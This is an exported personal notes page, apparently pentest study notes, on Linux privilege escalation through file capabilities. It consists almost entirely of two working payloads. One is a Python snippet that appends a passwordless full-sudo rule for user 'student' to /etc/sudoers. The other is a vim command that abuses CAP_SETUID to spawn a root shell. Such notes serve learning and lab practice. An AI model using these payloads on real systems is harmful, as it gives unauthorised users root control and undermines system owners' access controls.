<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>capabilites</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>capabilites</h1>

      <div class="ck-content">
        <p>for cap overwrite</p><pre><code class="language-text-plain">file = open("/etc/sudoers","a")
file.write("student ALL=(ALL) NOPASSWD:ALL")
file.close()</code></pre>

        <p>for <code>CAP_SETUID</code> on vim, we can use the following payload:  </p><pre><code class="language-text-plain">/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'</code></pre>
      </div>
    </div>
  </body>

</html>